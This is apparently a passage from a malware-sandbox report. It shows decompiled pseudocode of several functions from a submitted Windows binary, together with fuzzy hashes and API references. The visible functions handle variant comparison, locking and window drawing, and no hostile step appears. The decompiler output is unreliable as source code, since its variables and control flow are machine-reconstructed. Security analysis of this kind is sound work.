                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CurrentDirectory
                                                    • String ID: :
                                                    • API String ID: 1611563598-336475711
                                                    • Opcode ID: 1249958c054fa4984ce3416e04740fefc0778df6b06032fbb527210971bdf7ac
                                                    • Instruction ID: c5c7b0dff09aeac35822bcb6cbe030b0537c54a7cf5c2cde62247dac08ae10a0
                                                    • Opcode Fuzzy Hash: 1249958c054fa4984ce3416e04740fefc0778df6b06032fbb527210971bdf7ac
                                                    • Instruction Fuzzy Hash: 7DF096662497C01EE310E6698856BDB72DC8B55304F04442EBACCD73C2E6B8894457A7
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004166D4 Relevance: 7.8, APIs: 5, Instructions: 334COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 67%
                                                    			E004166D4(signed short* __eax, signed int __ecx, signed short* __edx, void* __edi, void* __fp0) {
				signed short* _v8;
				signed int _v12;
				char _v13;
				signed int _v16;
				signed int _v18;
				void* _v24;
				void* _v28;
				signed int _v44;
				void* __ebp;
				signed short _t136;
				signed short* _t256;
				intOrPtr _t307;
				intOrPtr _t310;
				intOrPtr _t318;
				intOrPtr _t325;
				intOrPtr _t333;
				signed int _t338;
				void* _t346;
				void* _t348;
				intOrPtr _t349;

				_t353 = __fp0;
				_t346 = _t348;
				_t349 = _t348 + 0xffffffd8;
				_v12 = __ecx;
				_v8 = __edx;
				_t256 = __eax;
				_v13 = 1;
				_t338 =  *((intOrPtr*)(__eax));
				if((_t338 & 0x00000fff) >= 0x10f) {
					_t136 =  *_v8;
					if(_t136 != 0) {
						if(_t136 != 1) {
							if(E0041713C(_t338,  &_v24) != 0) {
								_push( &_v18);
								if( *((intOrPtr*)( *_v24 + 8))() == 0) {
									_t341 =  *_v8;
									if(( *_v8 & 0x00000fff) >= 0x10f) {
										if(E0041713C(_t341,  &_v28) != 0) {
											_push( &_v16);
											if( *((intOrPtr*)( *_v28 + 4))() == 0) {
												E0041024C(0xb);
												goto L46;
											} else {
												if( *_t256 == _v16) {
													_v13 =  *((intOrPtr*)(0x49b404 + _v12 * 2 + ( *((intOrPtr*)( *_v28 + 0x34))(_v12) & 0x0000007f) - 0x1c));
													goto L46;
												} else {
													_push( &_v44);
													L0040F318();
													_push(_t346);
													_push(0x416ab5);
													_push( *[fs:eax]);
													 *[fs:eax] = _t349;
													_t268 = _v16 & 0x0000ffff;
													E00411330( &_v44, _v16 & 0x0000ffff, _t256, __edi, __fp0);
													if(_v44 != _v16) {
														E0041015C(_t268);
													}
													_v13 =  *((intOrPtr*)(0x49b404 + _v12 * 2 + ( *((intOrPtr*)( *_v28 + 0x34))(_v12) & 0x0000007f) - 0x1c));
													_pop(_t307);
													 *[fs:eax] = _t307;
													_push(0x416ae8);
													return E004109E8( &_v44);
												}
											}
										} else {
											E0041024C(0xb);
											goto L46;
										}
									} else {
										_push( &_v44);
										L0040F318();
										_push(_t346);
										_push(0x4169ff);
										_push( *[fs:eax]);
										 *[fs:eax] = _t349;
										_t273 =  *_v8 & 0x0000ffff;
										E00411330( &_v44,  *_v8 & 0x0000ffff, _t256, __edi, __fp0);
										if( *_v8 != _v44) {
											E0041015C(_t273);
										}
										_v13 = E00416548( &_v44, _v12, _v8, _t353);
										_pop(_t310);
										 *[fs:eax] = _t310;
										_push(0x416ae8);
										return E004109E8( &_v44);
									}
								} else {
									if( *_v8 == _v18) {
										_v13 =  *((intOrPtr*)(0x49b404 + _v12 * 2 + ( *((intOrPtr*)( *_v24 + 0x34))(_v12) & 0x0000007f) - 0x1c));
										goto L46;
									} else {
										_push( &_v44);
										L0040F318();
										_push(_t346);
										_push(0x41695d);
										_push( *[fs:eax]);
										 *[fs:eax] = _t349;
										_t278 = _v18 & 0x0000ffff;
										E00411330( &_v44, _v18 & 0x0000ffff, _v8, __edi, __fp0);
										if(_v44 != _v18) {
											E0041015C(_t278);
										}
										_v13 =  *((intOrPtr*)(0x49b404 + _v12 * 2 + ( *((intOrPtr*)( *_v24 + 0x34))(_v12) & 0x0000007f) - 0x1c));
										_pop(_t318);
										 *[fs:eax] = _t318;
										_push(0x416ae8);
										return E004109E8( &_v44);
									}
								}
							} else {
								E0041024C(__ecx);
								goto L46;
							}
						} else {
							_v13 = E00416328(_v12, 2);
							goto L46;
						}
					} else {
						_v13 = E00416314(0, 1);
						goto L46;
					}
				} else {
					if(_t338 != 0) {
						if(_t338 != 1) {
							if(E0041713C( *_v8,  &_v28) != 0) {
								_push( &_v16);
								if( *((intOrPtr*)( *_v28 + 4))() == 0) {
									_push( &_v44);
									L0040F318();
									_push(_t346);
									_push(0x41686d);
									_push( *[fs:eax]);
									 *[fs:eax] = _t349;
									_t284 =  *_t256 & 0x0000ffff;
									E00411330( &_v44,  *_t256 & 0x0000ffff, _v8, __edi, __fp0);
									if((_v44 & 0x00000fff) !=  *_t256) {
										E0041015C(_t284);
									}
									_v13 = E00416548(_t256, _v12,  &_v44, _t353);
									_pop(_t325);
									 *[fs:eax] = _t325;
									_push(0x416ae8);
									return E004109E8( &_v44);
								} else {
									if( *_t256 == _v16) {
										_v13 =  *((intOrPtr*)(0x49b404 + _v12 * 2 + ( *((intOrPtr*)( *_v28 + 0x34))(_v12) & 0x0000007f) - 0x1c));
										goto L46;
									} else {
										_push( &_v44);
										L0040F318();
										_push(_t346);
										_push(0x4167df);
										_push( *[fs:eax]);
										 *[fs:eax] = _t349;
										_t289 = _v16 & 0x0000ffff;
										E00411330( &_v44, _v16 & 0x0000ffff, _t256, __edi, __fp0);
										if((_v44 & 0x00000fff) != _v16) {
											E0041015C(_t289);
										}
										_v13 =  *((intOrPtr*)(0x49b404 + _v12 * 2 + ( *((intOrPtr*)( *_v28 + 0x34))(_v12) & 0x0000007f) - 0x1c));
										_pop(_t333);
										 *[fs:eax] = _t333;
										_push(0x416ae8);
										return E004109E8( &_v44);
									}
								}
							} else {
								E0041024C(__ecx);
								goto L46;
							}
						} else {
							_v13 = E00416328(_v12, 0);
							goto L46;
						}
					} else {
						_v13 = E00416314(1, 0);
						L46:
						return _v13;
					}
				}
			}























                                                    0x004166d4
                                                    0x004166d5
                                                    0x004166d7
                                                    0x004166dc
                                                    0x004166df
                                                    0x004166e2
                                                    0x004166e4
                                                    0x004166e8
                                                    0x004166f5
                                                    0x00416877
                                                    0x0041687d
                                                    0x00416897
                                                    0x004168b9
                                                    0x004168c8
                                                    0x004168db
                                                    0x00416991
                                                    0x0041699e
                                                    0x00416a15
                                                    0x00416a24
                                                    0x00416a36
                                                    0x00416ae3
                                                    0x00000000
                                                    0x00416a3c
                                                    0x00416a43
                                                    0x00416ade
                                                    0x00000000
                                                    0x00416a45
                                                    0x00416a48
                                                    0x00416a49
                                                    0x00416a50
                                                    0x00416a51
                                                    0x00416a56
                                                    0x00416a59
                                                    0x00416a5c
                                                    0x00416a65
                                                    0x00416a72
                                                    0x00416a74
                                                    0x00416a74
                                                    0x00416a9c
                                                    0x00416aa1
                                                    0x00416aa4
                                                    0x00416aa7
                                                    0x00416ab4
                                                    0x00416ab4
                                                    0x00416a43
                                                    0x00416a17
                                                    0x00416a17
                                                    0x00000000
                                                    0x00416a17
                                                    0x004169a0
                                                    0x004169a3
                                                    0x004169a4
                                                    0x004169ab
                                                    0x004169ac
                                                    0x004169b1
                                                    0x004169b4
                                                    0x004169ba
                                                    0x004169c2
                                                    0x004169d1
                                                    0x004169d3
                                                    0x004169d3
                                                    0x004169e6
                                                    0x004169eb
                                                    0x004169ee
                                                    0x004169f1
                                                    0x004169fe
                                                    0x004169fe
                                                    0x004168e1
                                                    0x004168eb
                                                    0x00416986
                                                    0x00000000
                                                    0x004168ed
                                                    0x004168f0
                                                    0x004168f1
                                                    0x004168f8
                                                    0x004168f9
                                                    0x004168fe
                                                    0x00416901
                                                    0x00416904
                                                    0x0041690e
                                                    0x0041691b
                                                    0x0041691d
                                                    0x0041691d
                                                    0x00416944
                                                    0x00416949
                                                    0x0041694c
                                                    0x0041694f
                                                    0x0041695c
                                                    0x0041695c
                                                    0x004168eb
                                                    0x004168bb
                                                    0x004168bb
                                                    0x00000000
                                                    0x004168bb
                                                    0x00416899
                                                    0x004168a5
                                                    0x00000000
                                                    0x004168a5
                                                    0x0041687f
                                                    0x00416888
                                                    0x00000000
                                                    0x00416888
                                                    0x004166fb
                                                    0x004166fe
                                                    0x00416715
                                                    0x0041673b
                                                    0x0041674a
                                                    0x0041675c
                                                    0x00416813
                                                    0x00416814
                                                    0x0041681b
                                                    0x0041681c
                                                    0x00416821
                                                    0x00416824
                                                    0x00416827
                                                    0x00416830
                                                    0x00416840
                                                    0x00416842
                                                    0x00416842
                                                    0x00416854
                                                    0x00416859
                                                    0x0041685c
                                                    0x0041685f
                                                    0x0041686c
                                                    0x00416762
                                                    0x00416769
                                                    0x00416808
                                                    0x00000000
                                                    0x0041676b
                                                    0x0041676e
                                                    0x0041676f
                                                    0x00416776
                                                    0x00416777
                                                    0x0041677c
                                                    0x0041677f
                                                    0x00416782
                                                    0x0041678b
                                                    0x0041679c
                                                    0x0041679e
                                                    0x0041679e
                                                    0x004167c6
                                                    0x004167cb
                                                    0x004167ce
                                                    0x004167d1
                                                    0x004167de
                                                    0x004167de
                                                    0x00416769
                                                    0x0041673d
                                                    0x0041673d
                                                    0x00000000
                                                    0x0041673d
                                                    0x00416717
                                                    0x00416723
                                                    0x00000000
                                                    0x00416723
                                                    0x00416700
                                                    0x00416709
                                                    0x00416ae8
                                                    0x00416af0
                                                    0x00416af0
                                                    0x004166fe

                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 52380f3934db917eae4a074d51a237f82e83a3ba5d3f730a33236230b57d628b
                                                    • Instruction ID: 126fbda12782d38e062267a272fec00c664f0fd244103826fb372783f4e2cac9
                                                    • Opcode Fuzzy Hash: 52380f3934db917eae4a074d51a237f82e83a3ba5d3f730a33236230b57d628b
                                                    • Instruction Fuzzy Hash: A0D18339A00149AFCF00EF94C4819EEBBB5EF49314F5544AAE840B7355D638EEC6CB69
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00415454 Relevance: 7.8, APIs: 5, Instructions: 271COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 64%
                                                    			E00415454(signed short* __eax, intOrPtr __ecx, signed short* __edx, void* __edi, void* __fp0) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				signed int _v18;
				signed int _v20;
				void* _v24;
				void* _v28;
				char _v44;
				void* __ebp;
				void* _t119;
				signed int _t207;
				intOrPtr _t216;
				intOrPtr _t217;
				intOrPtr _t250;
				intOrPtr _t255;
				intOrPtr _t259;
				intOrPtr _t264;
				intOrPtr _t268;
				void* _t271;
				void* _t273;
				intOrPtr _t274;

				_t278 = __fp0;
				_t269 = __edi;
				_t271 = _t273;
				_t274 = _t273 + 0xffffffd8;
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_t204 =  *_v8;
				if(( *_v8 & 0x00000fff) >= 0x10f) {
					if(E0041713C(_t204,  &_v24) == 0) {
						E0041024C(__ecx);
					}
					_push( &_v20);
					_t216 = _v16;
					if( *((intOrPtr*)( *_v24 + 8))() == 0) {
						_t207 =  *_v12;
						if((_t207 & 0x00000fff) >= 0x10f) {
							if(E0041713C(_t207,  &_v28) != 0) {
								_push( &_v18);
								_t217 = _v16;
								if( *((intOrPtr*)( *_v28 + 4))() == 0) {
									_t119 = E0041024C(_t217);
									goto L40;
								} else {
									if( *_v8 == _v18) {
										_t119 =  *((intOrPtr*)( *_v28 + 0x2c))(_v16);
										goto L40;
									} else {
										_push( &_v44);
										L0040F318();
										_push(_t271);
										_push(0x415779);
										_push( *[fs:eax]);
										 *[fs:eax] = _t274;
										_t219 = _v18 & 0x0000ffff;
										E00411330( &_v44, _v18 & 0x0000ffff, _v8, _t269, _t278);
										E00410E14(_v8,  &_v44);
										if( *_v8 != _v18) {
											E0041015C(_t219);
										}
										_pop(_t250);
										 *[fs:eax] = _t250;
										_push(0x415780);
										return E004109E8( &_v44);
									}
								}
							} else {
								_t119 = E0041024C(_t216);
								goto L40;
							}
						} else {
							if(_t207 ==  *_v8) {
								_t119 = E004161B0(_v8, _v16, _v12);
								goto L40;
							} else {
								_push( &_v44);
								L0040F318();
								_push(_t271);
								_push(0x4156ca);
								_push( *[fs:eax]);
								 *[fs:eax] = _t274;
								_t224 =  *_v12 & 0x0000ffff;
								E00411330( &_v44,  *_v12 & 0x0000ffff, _v8, _t269, _t278);
								E00410E14(_v8,  &_v44);
								if( *_v8 !=  *_v12) {
									E0041015C(_t224);
								}
								_pop(_t255);
								 *[fs:eax] = _t255;
								_push(0x4156d1);
								return E004109E8( &_v44);
							}
						}
					} else {
						if( *_v12 == _v20) {
							_t119 =  *((intOrPtr*)( *_v24 + 0x2c))(_v16);
							goto L40;
						} else {
							_push( &_v44);
							L0040F318();
							_push(_t271);
							_push(0x41562f);
							_push( *[fs:eax]);
							 *[fs:eax] = _t274;
							_t228 = _v20 & 0x0000ffff;
							E00411330( &_v44, _v20 & 0x0000ffff, _v12, _t269, _t278);
							if(_v44 != _v20) {
								E0041015C(_t228);
							}
							 *((intOrPtr*)( *_v24 + 0x2c))(_v16);
							_pop(_t259);
							 *[fs:eax] = _t259;
							_push(0x415799);
							return E004109E8( &_v44);
						}
					}
				} else {
					if(E0041713C( *_v12,  &_v28) != 0) {
						_push( &_v18);
						if( *((intOrPtr*)( *_v28 + 4))() == 0) {
							_push( &_v44);
							L0040F318();
							_push(_t271);
							_push(0x41558f);
							_push( *[fs:eax]);
							 *[fs:eax] = _t274;
							_t234 =  *_v8 & 0x0000ffff;
							E00411330( &_v44,  *_v8 & 0x0000ffff, _v12, __edi, __fp0);
							if( *_v8 != _v44) {
								E0041015C(_t234);
							}
							E004161B0(_v8, _v16,  &_v44);
							_pop(_t264);
							 *[fs:eax] = _t264;
							_push(0x415799);
							return E004109E8( &_v44);
						} else {
							if( *_v8 == _v18) {
								_t119 =  *((intOrPtr*)( *_v28 + 0x2c))(_v16);
								goto L40;
							} else {
								_push( &_v44);
								L0040F318();
								_push(_t271);
								_push(0x415514);
								_push( *[fs:eax]);
								 *[fs:eax] = _t274;
								_t239 = _v18 & 0x0000ffff;
								E00411330( &_v44, _v18 & 0x0000ffff, _v8, __edi, __fp0);
								E00410E14(_v8,  &_v44);
								if( *_v8 != _v18) {
									E0041015C(_t239);
								}
								_pop(_t268);
								 *[fs:eax] = _t268;
								_push(0x41551b);
								return E004109E8( &_v44);
							}
						}
					} else {
						_t119 = E0041024C(__ecx);
						L40:
						return _t119;
					}
				}
			}
























                                                    0x00415454
                                                    0x00415454
                                                    0x00415455
                                                    0x00415457
                                                    0x0041545b
                                                    0x0041545e
                                                    0x00415461
                                                    0x00415467
                                                    0x00415474
                                                    0x004155a5
                                                    0x004155a7
                                                    0x004155a7
                                                    0x004155af
                                                    0x004155b3
                                                    0x004155c0
                                                    0x00415650
                                                    0x0041565d
                                                    0x004156f3
                                                    0x00415702
                                                    0x00415706
                                                    0x00415713
                                                    0x00415794
                                                    0x00000000
                                                    0x00415715
                                                    0x0041571f
                                                    0x0041578f
                                                    0x00000000
                                                    0x00415721
                                                    0x00415724
                                                    0x00415725
                                                    0x0041572c
                                                    0x0041572d
                                                    0x00415732
                                                    0x00415735
                                                    0x00415738
                                                    0x00415742
                                                    0x0041574d
                                                    0x0041575c
                                                    0x0041575e
                                                    0x0041575e
                                                    0x00415765
                                                    0x00415768
                                                    0x0041576b
                                                    0x00415778
                                                    0x00415778
                                                    0x0041571f
                                                    0x004156f5
                                                    0x004156f5
                                                    0x00000000
                                                    0x004156f5
                                                    0x00415663
                                                    0x0041566c
                                                    0x004156da
                                                    0x00000000
                                                    0x0041566e
                                                    0x00415671
                                                    0x00415672
                                                    0x00415679
                                                    0x0041567a
                                                    0x0041567f
                                                    0x00415682
                                                    0x00415688
                                                    0x00415691
                                                    0x0041569c
                                                    0x004156ad
                                                    0x004156af
                                                    0x004156af
                                                    0x004156b6
                                                    0x004156b9
                                                    0x004156bc
                                                    0x004156c9
                                                    0x004156c9
                                                    0x0041566c
                                                    0x004155c6
                                                    0x004155d0
                                                    0x00415645
                                                    0x00000000
                                                    0x004155d2
                                                    0x004155d5
                                                    0x004155d6
                                                    0x004155dd
                                                    0x004155de
                                                    0x004155e3
                                                    0x004155e6
                                                    0x004155e9
                                                    0x004155f3
                                                    0x00415600
                                                    0x00415602
                                                    0x00415602
                                                    0x00415616
                                                    0x0041561b
                                                    0x0041561e
                                                    0x00415621
                                                    0x0041562e
                                                    0x0041562e
                                                    0x004155d0
                                                    0x0041547a
                                                    0x0041548a
                                                    0x00415499
                                                    0x004154aa
                                                    0x00415535
                                                    0x00415536
                                                    0x0041553d
                                                    0x0041553e
                                                    0x00415543
                                                    0x00415546
                                                    0x0041554c
                                                    0x00415555
                                                    0x00415564
                                                    0x00415566
                                                    0x00415566
                                                    0x00415574
                                                    0x0041557b
                                                    0x0041557e
                                                    0x00415581
                                                    0x0041558e
                                                    0x004154b0
                                                    0x004154ba
                                                    0x0041552a
                                                    0x00000000
                                                    0x004154bc
                                                    0x004154bf
                                                    0x004154c0
                                                    0x004154c7
                                                    0x004154c8
                                                    0x004154cd
                                                    0x004154d0
                                                    0x004154d3
                                                    0x004154dd
                                                    0x004154e8
                                                    0x004154f7
                                                    0x004154f9
                                                    0x004154f9
                                                    0x00415500
                                                    0x00415503
                                                    0x00415506
                                                    0x00415513
                                                    0x00415513
                                                    0x004154ba
                                                    0x0041548c
                                                    0x0041548c
                                                    0x00415799
                                                    0x0041579d
                                                    0x0041579d
                                                    0x0041548a

                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 004154C0
                                                    • VariantInit.OLEAUT32(?), ref: 004155D6
                                                      • Part of subcall function 0041713C: RtlEnterCriticalSection.KERNEL32(0049E828,?,?,?,00000000,?,00416D60,00000000,00416E06,?,?,?,?,?,004101DF,00000000), ref: 00417172
                                                      • Part of subcall function 0041713C: RtlLeaveCriticalSection.KERNEL32(0049E828,004171EB,?,0049E828,?,?,?,00000000,?,00416D60,00000000,00416E06), ref: 004171DE
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalInitSectionVariant$EnterLeave
                                                    • String ID:
                                                    • API String ID: 2777075435-0
                                                    • Opcode ID: 911dfcfbc7a12d5b52f32f0e07c108f6710307d6a7d9ba3bae60d823c04f13e4
                                                    • Instruction ID: a24615229599b446cf83ad5ef8fc14772df329521493faa61475ffe7701a7f51
                                                    • Opcode Fuzzy Hash: 911dfcfbc7a12d5b52f32f0e07c108f6710307d6a7d9ba3bae60d823c04f13e4
                                                    • Instruction Fuzzy Hash: D8B16D79A00609EFDB00EF94C5818EDB7B5FF89714F9040A6E804A7751D738AEC5CB68
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0044AF00 Relevance: 7.7, APIs: 5, Instructions: 162COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 85%
                                                    			E0044AF00(void* __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, int _a4, char _a8, struct tagRECT* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				struct tagRECT _v32;
				void* _t53;
				int _t63;
				CHAR* _t65;
				void* _t76;
				void* _t78;
				int _t89;
				CHAR* _t91;
				int _t117;
				intOrPtr _t127;
				void* _t139;
				void* _t144;
				char _t153;

				_t120 = __ecx;
				_t143 = _t144;
				_v16 = 0;
				_v12 = __ecx;
				_v8 = __edx;
				_t139 = __eax;
				_t117 = _a4;
				_push(_t144);
				_push(0x44b0e4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t144 + 0xffffffe4;
				_t53 = E0044CE98(__eax);
				_t135 = _t53;
				if(_t53 != 0 && E0044E4D4(_t135) != 0) {
					if((_t117 & 0x00000000) != 0) {
						__eflags = (_t117 & 0x00000002) - 2;
						if((_t117 & 0x00000002) == 2) {
							_t117 = _t117 & 0xfffffffd;
							__eflags = _t117;
						}
					} else {
						_t117 = _t117 & 0xffffffff | 0x00000002;
					}
					_t117 = _t117 | 0x00020000;
				}
				E00404A58( &_v16, _v12);
				if((_t117 & 0x00000004) == 0) {
					L12:
					E00404DCC(_v16, 0x44b108);
					if(_t153 != 0) {
						E004256F8( *((intOrPtr*)(_v8 + 0x14)), _t120, 1, _t135, _t143, __eflags);
						__eflags =  *((char*)(_t139 + 0x3a));
						if( *((char*)(_t139 + 0x3a)) != 0) {
							_t136 =  *((intOrPtr*)(_v8 + 0xc));
							__eflags = E004250D0( *((intOrPtr*)(_v8 + 0xc))) |  *0x44b10c;
							E004250DC( *((intOrPtr*)(_v8 + 0xc)), E004250D0( *((intOrPtr*)(_v8 + 0xc))) |  *0x44b10c, _t136, _t139, _t143);
						}
						__eflags =  *((char*)(_t139 + 0x39));
						if( *((char*)(_t139 + 0x39)) != 0) {
							L24:
							_t63 = E00404C80(_v16);
							_t65 = E00404E80(_v16);
							DrawTextA(E00425C68(_v8), _t65, _t63, _a12, _t117);
							L25:
							_pop(_t127);
							 *[fs:eax] = _t127;
							_push(0x44b0eb);
							return E004049C0( &_v16);
						} else {
							__eflags = _a8;
							if(_a8 == 0) {
								OffsetRect(_a12, 1, 1);
								E00424E10( *((intOrPtr*)(_v8 + 0xc)), 0xff000014);
								_t89 = E00404C80(_v16);
								_t91 = E00404E80(_v16);
								DrawTextA(E00425C68(_v8), _t91, _t89, _a12, _t117);
								OffsetRect(_a12, 0xffffffff, 0xffffffff);
							}
							__eflags = _a8;
							if(_a8 == 0) {
								L23:
								E00424E10( *((intOrPtr*)(_v8 + 0xc)), 0xff000010);
							} else {
								_t76 = E00424950(0xff00000d);
								_t78 = E00424950(0xff000010);
								__eflags = _t76 - _t78;
								if(_t76 != _t78) {
									goto L23;
								}
								E00424E10( *((intOrPtr*)(_v8 + 0xc)), 0xff000014);
							}
							goto L24;
						}
					}
					if((_t117 & 0x00000004) == 0) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_v32.top = _v32.top + 4;
						DrawEdge(E00425C68(_v8),  &_v32, 6, 2);
					}
					goto L25;
				} else {
					if(_v16 == 0) {
						L11:
						E00404C88( &_v16, 0x44b0fc);
						goto L12;
					}
					if( *_v16 != 0x26) {
						goto L12;
					}
					_t153 =  *((char*)(_v16 + 1));
					if(_t153 != 0) {
						goto L12;
					}
					goto L11;
				}
			}



















                                                    0x0044af00
                                                    0x0044af01
                                                    0x0044af0b
                                                    0x0044af0e
                                                    0x0044af11
                                                    0x0044af14
                                                    0x0044af16
                                                    0x0044af1b
                                                    0x0044af1c
                                                    0x0044af21
                                                    0x0044af24
                                                    0x0044af29
                                                    0x0044af2e
                                                    0x0044af32
                                                    0x0044af42
                                                    0x0044af51
                                                    0x0044af54
                                                    0x0044af59
                                                    0x0044af59
                                                    0x0044af59
                                                    0x0044af44
                                                    0x0044af47
                                                    0x0044af47
                                                    0x0044af5c
                                                    0x0044af5c
                                                    0x0044af68
                                                    0x0044af70
                                                    0x0044af96
                                                    0x0044af9e
                                                    0x0044afa3
                                                    0x0044afe1
                                                    0x0044afe6
                                                    0x0044afea
                                                    0x0044afef
                                                    0x0044affb
                                                    0x0044b003
                                                    0x0044b003
                                                    0x0044b008
                                                    0x0044b00c
                                                    0x0044b0a9
                                                    0x0044b0b1
                                                    0x0044b0ba
                                                    0x0044b0c9
                                                    0x0044b0ce
                                                    0x0044b0d0
                                                    0x0044b0d3
                                                    0x0044b0d6
                                                    0x0044b0e3
                                                    0x0044b012
                                                    0x0044b012
                                                    0x0044b016
                                                    0x0044b020
                                                    0x0044b030
                                                    0x0044b03d
                                                    0x0044b046
                                                    0x0044b055
                                                    0x0044b062
                                                    0x0044b062
                                                    0x0044b067
                                                    0x0044b06b
                                                    0x0044b099
                                                    0x0044b0a4
                                                    0x0044b06d
                                                    0x0044b072
                                                    0x0044b07e
                                                    0x0044b083
                                                    0x0044b085
                                                    0x00000000
                                                    0x00000000
                                                    0x0044b092
                                                    0x0044b092
                                                    0x00000000
                                                    0x0044b06b
                                                    0x0044b00c
                                                    0x0044afa8
                                                    0x0044afb6
                                                    0x0044afb7
                                                    0x0044afb8
                                                    0x0044afb9
                                                    0x0044afba
                                                    0x0044afcf
                                                    0x0044afcf
                                                    0x00000000
                                                    0x0044af72
                                                    0x0044af76
                                                    0x0044af89
                                                    0x0044af91
                                                    0x00000000
                                                    0x0044af91
                                                    0x0044af7e
                                                    0x00000000
                                                    0x00000000
                                                    0x0044af83
                                                    0x0044af87
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0044af87

                                                    APIs
                                                    • DrawEdge.USER32(00000000,?,00000006,00000002), ref: 0044AFCF
                                                    • OffsetRect.USER32(?,00000001,00000001), ref: 0044B020
                                                    • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 0044B055
                                                    • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044B062
                                                    • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 0044B0C9
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Draw$OffsetRectText$Edge
                                                    • String ID:
                                                    • API String ID: 3610532707-0
                                                    • Opcode ID: 18493c12ef401e963272a7311625c849f2c9f643628862a87cd9f04e99074c40
                                                    • Instruction ID: ea5abe3bfc9a9df89051e6d8e73c4225462b89b626b3e2b5561302bed16b813c
                                                    • Opcode Fuzzy Hash: 18493c12ef401e963272a7311625c849f2c9f643628862a87cd9f04e99074c40
                                                    • Instruction Fuzzy Hash: C551A3B0A04204AFEB10EBA9D881B9F73E5EF44324F55856BF924A7381C73CED048B59
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0043F3B8 Relevance: 7.6, APIs: 5, Instructions: 104COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 85%
                                                    			E0043F3B8(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				int _v16;
				int _v20;
				struct tagPAINTSTRUCT _v84;
				intOrPtr _t55;
				void* _t64;
				struct HDC__* _t75;
				intOrPtr _t84;
				void* _t95;
				void* _t96;
				void* _t98;
				void* _t100;
				void* _t101;
				intOrPtr _t102;

				_t100 = _t101;
				_t102 = _t101 + 0xffffffb0;
				_v12 = __edx;
				_v8 = __eax;
				_t75 =  *(_v12 + 4);
				if(_t75 == 0) {
					_t75 = BeginPaint(E00441704(_v8),  &_v84);
				}
				_push(_t100);
				_push(0x43f4d8);
				_push( *[fs:edx]);
				 *[fs:edx] = _t102;
				if( *((intOrPtr*)(_v8 + 0x198)) != 0) {
					_v20 = SaveDC(_t75);
					_v16 = 2;
					_t95 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x198)) + 8)) - 1;
					if(_t95 >= 0) {
						_t96 = _t95 + 1;
						_t98 = 0;
						do {
							_t64 = E0041AC6C( *((intOrPtr*)(_v8 + 0x198)), _t98);
							if( *((char*)(_t64 + 0x57)) != 0 || ( *(_t64 + 0x1c) & 0x00000010) != 0 && ( *(_t64 + 0x51) & 0x00000004) == 0) {
								if(( *(_t64 + 0x50) & 0x00000040) == 0) {
									goto L11;
								} else {
									_v16 = ExcludeClipRect(_t75,  *(_t64 + 0x40),  *(_t64 + 0x44),  *(_t64 + 0x40) +  *((intOrPtr*)(_t64 + 0x48)),  *(_t64 + 0x44) +  *((intOrPtr*)(_t64 + 0x4c)));
									if(_v16 != 1) {
										goto L11;
									}
								}
							} else {
								goto L11;
							}
